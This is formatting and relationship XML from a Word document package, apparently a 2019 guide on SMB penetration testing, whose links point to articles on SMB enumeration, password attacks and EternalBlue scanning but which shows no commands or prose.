            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="686372651">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1198153407">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2042894576">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="103840970">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2099155">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="680477142">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="702943741">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="907418611">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1971134144">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="779572646">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="27475487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9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX13.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/5-ways-to-hack-smb-login-password/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX34.xm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07" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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hackingarticles.in/4-ways-capture-ntlm-hashes-network/"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control" Target="activeX/activeX21.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX27.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX30.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX33.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX39.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.wmf"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX37.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX6.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX7.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control" Target="activeX/activeX16.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX20.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/penetration-testing-in-smb-protocol-using-metasploit/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX25.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX29.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX38.xml"/><Relationship Id="rId105"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control" Target="activeX/activeX32.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId98"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control" Target="activeX/activeX5.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX8.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX15.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX24.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/multiple-ways-to-connect-remote-pc-using-smb-port/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX19.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><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3.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.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hyperlink" Target="https://www.hackingarticles.in/5-ways-to-hack-smb-login-password/"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control" Target="activeX/activeX12.xml"/><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control" Target="activeX/activeX41.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/3-ways-scan-eternal-blue-vulnerability-remote-pc/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX10.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX14.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX18.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX22.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX23.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX31.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX36.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId101"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7.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX11.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX17.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX28.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX40.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX26.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX3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47</Pages>
  <Words>5072</Words>
  <Characters>28914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MA</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-16T03:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-16T03:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>